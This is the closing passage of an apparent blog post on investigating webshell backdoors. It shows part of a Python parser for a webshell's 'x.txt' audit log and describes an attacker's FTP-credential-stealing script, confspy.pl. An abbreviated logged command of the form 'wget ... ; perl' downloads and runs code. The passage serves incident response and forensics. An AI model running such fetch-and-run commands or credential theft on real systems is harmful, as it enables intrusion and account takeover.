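    for e in parse_entries(SAMPLE_XTXT):
        print(e["when"].isoformat(), e["ip"], e["url"], e["tags"], e["cmd"])
    for ip, s in summarize(parse_entries(SAMPLE_XTXT)).items():
        print(ip, s["count"], sorted(s["tags"]), s["hot"])
```

Commands like "perl ftp" above carry no tag on their own; the preceding "wget ... ; perl ftp" entry does, which is why the timeline is sorted before it is read.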

As you can see, this particular attacker executed many commands. The most notable was downloading and running this program:

[Screenshot: the downloaded confspy.pl script]
The "confspy.pl" script searches users' home directories and attempts to steal their FTP credentials. Knowing that a tool like this has been run on your system widens the scope of the compromise: your users would need to change all of their passwords to keep the attacker from regaining access, even after you patch the original Timthumb attack vector.

Takeaways

After analyzing these types of webshell backdoors for quite some time, it is clear that the majority of these attackers are simply re-using webshells written by others. They merely modify the page TITLE or color scheme to take some cosmetic ownership of the code. This is one of the main reasons the audit logging code persists in these webshells. In addition to the more common audit log name of "x.txt", you should also look for "logx.txt", which has been seen quite frequently as well. Hopefully this information will help if you find that your website has been compromised and you are trying to identify what actions the attacker executed.
